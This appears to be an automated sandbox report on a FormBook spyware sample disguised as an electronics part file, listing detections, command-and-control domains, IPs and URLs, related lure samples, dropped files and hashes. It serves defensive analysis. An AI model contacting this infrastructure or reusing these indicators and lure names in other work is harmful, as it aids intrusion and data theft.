Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	42%	ReversingLabs	ByteCode-MSIL.Backdoor.FormBook
3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	46%	Virustotal		Browse
3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	100%	Avira	HEUR/AGEN.1310400
3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.activeusers.tech/s76m/?BXc8V=5+vWPd9X0wSWPJRdjPK4htAFucAo2VruY7NWHsZJjc93W8tV5J/CvgfDxHaReh/JOtz7+f35BLAy5HXA0CqVvOWOdVDklARjVuGkQkqqALzufSU8AevfCiY=&f898=D4YHodiH3rXTfZ	0%	Avira URL Cloud	safe
http://www.rpa.asia/5blw/	0%	Avira URL Cloud	safe
http://www.boldjourn.website/6qnn/?BXc8V=jZjCtW5Z35UjZn8TZsrAhfuPzAvLvIn1UqsIYqvINL5GRqKd5l5cN7nY2f+SbBmC2WETDruk6ZGN6IqYT24Zv1a8PLIHAmXFEvfhPzClF16HpP7M54iZiSM=&f898=D4YHodiH3rXTfZ	0%	Avira URL Cloud	safe
http://www.rtp189z.lat/tt36/?BXc8V=7XRN4ZBNuxsgsz85WwF8d5RVD19EzJb4JnIab8u1JoWwH5zq0g0l+ZcBEWO33waNPxeiCBvzmGaSpdMTI8OJtChGzZiriz+EVcp1nviLXn5OzCwSP0UMhIk=&f898=D4YHodiH3rXTfZ	0%	Avira URL Cloud	safe
http://www.givvjn.info/e4zw/?BXc8V=vBV+S5Q8h7Cl09PJqQteIVoPn0WMDxyCQPiiXTQrjiV2j0wk8nAmuATUOuyLShoOecv/N06oacatEhkR7UdQnNX8vYYfl5KO9EIWGMCepu/511PNPsKoGB8=&f898=D4YHodiH3rXTfZ	0%	Avira URL Cloud	safe
http://server/get.asp	0%	Avira URL Cloud	safe
http://www.littlecarseats.shop/vngz/?BXc8V=BywAvqZrlXCPypxowigGU/RMQqJ+aFEu4r9fzmpnpak2vS64kVBA8ZUuc20d6AYdHHbV7T9IEXhUPkXJmH12l+9kSAAe2W5CHPw/a2fo9vOL4zfBkwpEEo8=&f898=D4YHodiH3rXTfZ	0%	Avira URL Cloud	safe
http://www.lugao.xyz/qixh/?BXc8V=1RMEcCmOa+NBnL2H42a1any5QtiTZ5BG62LeNlaTxkSavmi+Sr/0k147vVBI8c7b7ZvrdBlJEtVahWNDtgmsFIs/6lOYP2MHU69GVvy+6ALSisvzm9a+ML0=&f898=D4YHodiH3rXTfZ	0%	Avira URL Cloud	safe
http://www.lugao.xyz/qixh/	0%	Avira URL Cloud	safe
http://www.oequ8s1l.vip/izrj/	0%	Avira URL Cloud	safe
http://www.rpa.asia	0%	Avira URL Cloud	safe
http://www.rtp189z.lat/tt36/	0%	Avira URL Cloud	safe
http://www.boldjourn.website/6qnn/	0%	Avira URL Cloud	safe
http://www.givvjn.info/e4zw/	0%	Avira URL Cloud	safe
http://www.activeusers.tech/s76m/	0%	Avira URL Cloud	safe
http://www.oequ8s1l.vip/izrj/?f898=D4YHodiH3rXTfZ&BXc8V=j50sR9qwIfHSiYtxTFFp7g89UJFry+rQTe0kZ9YXVPGo3xxAz/jXuWZxuk+F1xvQPOoZdxLEIBdogShtQlOGjR8qYGUmJGoMkDNaZ33tU1jJrtqR7YIPhnQ=	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
2xieerbi.dun899.com	149.104.185.93	true	true	unknown
www.lugao.xyz	172.67.147.28	true	true	unknown
rtp189z.lat	68.65.122.71	true	true	unknown
www.rpa.asia	160.25.166.123	true	true	unknown
www.givvjn.info	47.83.1.90	true	true	unknown
www.boldjourn.website	209.74.64.189	true	true	unknown
www.littlecarseats.shop	104.21.83.145	true	false	unknown
www.activeusers.tech	199.59.243.228	true	true	unknown
www.oequ8s1l.vip	unknown	unknown	false	unknown
www.rtp189z.lat	unknown	unknown	false	unknown
www.juiceem.shop	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.rtp189z.lat/tt36/?BXc8V=7XRN4ZBNuxsgsz85WwF8d5RVD19EzJb4JnIab8u1JoWwH5zq0g0l+ZcBEWO33waNPxeiCBvzmGaSpdMTI8OJtChGzZiriz+EVcp1nviLXn5OzCwSP0UMhIk=&f898=D4YHodiH3rXTfZ	true	Avira URL Cloud: safe	unknown
http://www.activeusers.tech/s76m/?BXc8V=5+vWPd9X0wSWPJRdjPK4htAFucAo2VruY7NWHsZJjc93W8tV5J/CvgfDxHaReh/JOtz7+f35BLAy5HXA0CqVvOWOdVDklARjVuGkQkqqALzufSU8AevfCiY=&f898=D4YHodiH3rXTfZ	true	Avira URL Cloud: safe	unknown
http://www.oequ8s1l.vip/izrj/	true	Avira URL Cloud: safe	unknown
http://www.littlecarseats.shop/vngz/?BXc8V=BywAvqZrlXCPypxowigGU/RMQqJ+aFEu4r9fzmpnpak2vS64kVBA8ZUuc20d6AYdHHbV7T9IEXhUPkXJmH12l+9kSAAe2W5CHPw/a2fo9vOL4zfBkwpEEo8=&f898=D4YHodiH3rXTfZ	false	Avira URL Cloud: safe	unknown
http://www.boldjourn.website/6qnn/?BXc8V=jZjCtW5Z35UjZn8TZsrAhfuPzAvLvIn1UqsIYqvINL5GRqKd5l5cN7nY2f+SbBmC2WETDruk6ZGN6IqYT24Zv1a8PLIHAmXFEvfhPzClF16HpP7M54iZiSM=&f898=D4YHodiH3rXTfZ	true	Avira URL Cloud: safe	unknown
http://www.rpa.asia/5blw/	true	Avira URL Cloud: safe	unknown
http://www.givvjn.info/e4zw/?BXc8V=vBV+S5Q8h7Cl09PJqQteIVoPn0WMDxyCQPiiXTQrjiV2j0wk8nAmuATUOuyLShoOecv/N06oacatEhkR7UdQnNX8vYYfl5KO9EIWGMCepu/511PNPsKoGB8=&f898=D4YHodiH3rXTfZ	true	Avira URL Cloud: safe	unknown
http://www.lugao.xyz/qixh/?BXc8V=1RMEcCmOa+NBnL2H42a1any5QtiTZ5BG62LeNlaTxkSavmi+Sr/0k147vVBI8c7b7ZvrdBlJEtVahWNDtgmsFIs/6lOYP2MHU69GVvy+6ALSisvzm9a+ML0=&f898=D4YHodiH3rXTfZ	true	Avira URL Cloud: safe	unknown
http://www.lugao.xyz/qixh/	true	Avira URL Cloud: safe	unknown
http://www.oequ8s1l.vip/izrj/?f898=D4YHodiH3rXTfZ&BXc8V=j50sR9qwIfHSiYtxTFFp7g89UJFry+rQTe0kZ9YXVPGo3xxAz/jXuWZxuk+F1xvQPOoZdxLEIBdogShtQlOGjR8qYGUmJGoMkDNaZ33tU1jJrtqR7YIPhnQ=	true	Avira URL Cloud: safe	unknown
http://www.givvjn.info/e4zw/	true	Avira URL Cloud: safe	unknown
http://www.rtp189z.lat/tt36/	true	Avira URL Cloud: safe	unknown
http://www.activeusers.tech/s76m/	true	Avira URL Cloud: safe	unknown
http://www.boldjourn.website/6qnn/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://server/get.asp	cvSKtqilyhlQ.exe, 00000006.00000002.3524646475.0000000000968000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	bitsadmin.exe, 00000007.00000002.3526173862.00000000041CE000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3528139415.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, cvSKtqilyhlQ.exe, 00000008.00000002.3525704940.0000000003C4E000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.rpa.asia	cvSKtqilyhlQ.exe, 00000008.00000002.3525202420.0000000002C2A000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	bitsadmin.exe, 00000007.00000003.2465093183.0000000007868000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
160.25.166.123	www.rpa.asia	unknown	17676	GIGAINFRASoftbankBBCorpJP	true
47.83.1.90	www.givvjn.info	United States	3209	VODANETInternationalIP-BackboneofVodafoneDE	true
172.67.147.28	www.lugao.xyz	United States	13335	CLOUDFLARENETUS	true
104.21.83.145	www.littlecarseats.shop	United States	13335	CLOUDFLARENETUS	false
149.104.185.93	2xieerbi.dun899.com	United States	174	COGENT-174US	true
199.59.243.228	www.activeusers.tech	United States	395082	BODIS-NJUS	true
209.74.64.189	www.boldjourn.website	United States	31744	MULTIBAND-NEWHOPEUS	true
68.65.122.71	rtp189z.lat	United States	22612	NAMECHEAP-NETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592544
Start date and time:	2025-01-16 09:21:38 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@11/8
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 97% Number of executed functions: 203 Number of non-executed functions: 311
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 184.28.90.27, 2.23.242.162, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target cvSKtqilyhlQ.exe, PID 5856 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
160.25.166.123	MACHINE SPECIFICATIONS.exe	Get hash	malicious	FormBook	Browse	www.rpa.asia/bwjl/
	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	www.rpa.asia/74m3/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.rpa.asia/bwjl/
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.rpa.asia/bwjl/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.rpa.asia/bwjl/
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	www.rpa.asia/ggyo/
47.83.1.90	PO No. 0146850827805 HSP0059842.exe	Get hash	malicious	FormBook	Browse	www.adadev.info/ctdy/
	PO -2025918.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.qzsazi.info/bqha/
	PO 2025918 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.qzsazi.info/bqha/
	New Order#12125.exe	Get hash	malicious	FormBook	Browse	www.adadev.info/ctdy/
	MACHINE SPECIFICATIONS.exe	Get hash	malicious	FormBook	Browse	www.givvjn.info/nkmx/
	CSZ inquiry for MH raw material.exe	Get hash	malicious	FormBook	Browse	www.adadev.info/ctdy/
	1001-13.exe	Get hash	malicious	FormBook	Browse	www.ripbgs.info/hf4a/
	BDlwy8b7Km.exe	Get hash	malicious	FormBook	Browse	www.givvjn.info/wl3x/?94=IDH/sxYsqLulkbcslybjsGNv3NS6VvVpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeI9ZMZ+p0PiMQUF+eqUdc9aZVsWrUptbZMNnY=&TXVlY=nv6XU20pgPTDN0
	k9OEsV37GE.exe	Get hash	malicious	FormBook	Browse	www.dkeqqi.info/1dyw/?cNPH=r4IIUaGg8Ysw6Z88K77s9M2UXGNuluWHvSk1OgU5mSYSbSsTUuuLMPChZLQsUTMX5ns6JDTUfCzdkiOd4VeD2v0HOFU0ImfoMqjgmv5MAgVZY7DuZfSFf9DemTdSFvne3C9WyBVTb1Eg&EtJTX=_JVX4ryxDRQpLJF
	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	www.givvjn.info/wl3x/?9F=IDH/sxYsqLulkbctqSbdtx5w6svLFYBpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeIvIpAz78Fkv0uY+bcXdYna/YYRI4X4Lt1dDHtrJaiCZnHtgyfQjAASlTW&wtE0B=1LjxZz
104.21.83.145	ZmWSzgevgt.exe	Get hash	malicious	NetSupport RAT, LummaC Stealer	Browse	tankqueueipjsh.pw/api
104.21.83.145	ZmWSzgevgt.exe	Get hash	malicious	NetSupport RAT, LummaC Stealer	Browse	tankqueueipjsh.pw/api

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.rpa.asia	MACHINE SPECIFICATIONS.exe	Get hash	malicious	FormBook	Browse	160.25.166.123
	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	160.25.166.123
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	160.25.166.123
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	160.25.166.123
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	160.25.166.123
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	160.25.166.123
www.givvjn.info	MACHINE SPECIFICATIONS.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	BDlwy8b7Km.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	k9OEsV37GE.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
www.activeusers.tech	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	199.59.243.227

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GIGAINFRASoftbankBBCorpJP	i686.elf	Get hash	malicious	Unknown	Browse	60.147.227.62
	87.121.112.22-arm-2025-01-16T06_52_38.elf	Get hash	malicious	Unknown	Browse	126.3.163.44
	87.121.112.22-mips-2025-01-16T06_52_39.elf	Get hash	malicious	Unknown	Browse	219.34.250.127
	arm7.elf	Get hash	malicious	Unknown	Browse	219.11.64.74
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	60.112.27.24
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	221.87.197.16
	res.spc.elf	Get hash	malicious	Unknown	Browse	219.188.142.235
	res.arm.elf	Get hash	malicious	Unknown	Browse	219.23.126.1
	hNgIvHRuTU.dll	Get hash	malicious	Wannacry	Browse	218.112.212.165
	2lX8Z3eydC.dll	Get hash	malicious	Wannacry	Browse	126.217.0.3
CLOUDFLARENETUS	MACHINE SPECIFICATION.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	https://56.hanagibenewe.ru/Y7MD/	Get hash	malicious	Unknown	Browse	104.17.25.14
	creal.exe	Get hash	malicious	Python Stealer, Creal Stealer	Browse	104.26.13.205
	54403 ADVANCED DEMURRAGE PROFORMA 15.01.2025.scr.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	http://links.888brands.net/ctt?m=34615482&r=LTg3OTY1NDQ3MDYS1&b=0&j=Mjc2MDE1OTMzMwS2&mt=1&kt=12&kx=1&k=email-router-cross_secureutils&kd=//american-faucet-and-coatings-corporation.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	162.159.128.70
	55ryoipjfdr.exe	Get hash	malicious	Trickbot	Browse	104.26.12.205
	ORDER-202577008.lnk	Get hash	malicious	Unknown	Browse	104.21.96.1
	INQUIRY LIST 292.vbs	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
	Contrarre.scr.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	PI ITS15235 (2).doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
VODANETInternationalIP-BackboneofVodafoneDE	boatnet.arm.elf	Get hash	malicious	Mirai, Gafgyt	Browse	188.107.45.142
	PO No. 0146850827805 HSP0059842.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	PO -2025918.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	47.83.1.90
	bot.arm7.elf	Get hash	malicious	Mirai	Browse	92.218.91.26
	bot.ppc.elf	Get hash	malicious	Unknown	Browse	92.218.245.175
	xd.spc.elf	Get hash	malicious	Mirai	Browse	88.79.137.163
	XB6SkLK7Al.dll	Get hash	malicious	Wannacry	Browse	47.70.157.78
	F1G5BkUV74.dll	Get hash	malicious	Wannacry	Browse	178.11.135.196
	hsmSW6Eifl.dll	Get hash	malicious	Wannacry	Browse	178.7.0.211
	9nNO3SHiV1.dll	Get hash	malicious	Wannacry	Browse	212.144.65.1
CLOUDFLARENETUS	MACHINE SPECIFICATION.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	https://56.hanagibenewe.ru/Y7MD/	Get hash	malicious	Unknown	Browse	104.17.25.14
	creal.exe	Get hash	malicious	Python Stealer, Creal Stealer	Browse	104.26.13.205
	54403 ADVANCED DEMURRAGE PROFORMA 15.01.2025.scr.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	http://links.888brands.net/ctt?m=34615482&r=LTg3OTY1NDQ3MDYS1&b=0&j=Mjc2MDE1OTMzMwS2&mt=1&kt=12&kx=1&k=email-router-cross_secureutils&kd=//american-faucet-and-coatings-corporation.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	162.159.128.70
	55ryoipjfdr.exe	Get hash	malicious	Trickbot	Browse	104.26.12.205
	ORDER-202577008.lnk	Get hash	malicious	Unknown	Browse	104.21.96.1
	INQUIRY LIST 292.vbs	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
	Contrarre.scr.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	PI ITS15235 (2).doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1

Process:	C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\6p1225E

Download File

Process:	C:\Windows\SysWOW64\bitsadmin.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.606982842407777
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
File size:	945'152 bytes
MD5:	6e482564396bb10f5afb4244e505c3e6
SHA1:	9564141dbcedfa4bfc2df6f789db0ab8bbffad99
SHA256:	8fe18e6c77d0b63ad58b669472c8247a8771c82ce4edc65814bb4c53fe5ab51c
SHA512:	9aafd97723ee6f5ee76b187ce98ea923b4bf1d3c9bc3bbc09a6689aaf6a216e91088a9463bc4b7bf98a921ae6d591e2286c2d62d743dda77686457da39142dd2
SSDEEP:	12288:WPfAGTyWXV7O1d7bXDjJfaEzrdDF4nnCuZ1LW7kxtPgY8hNnc2HpupCAwIXwa8nO:4fvxO1d7bDjBpzJKnCuZA6Kc6UEW
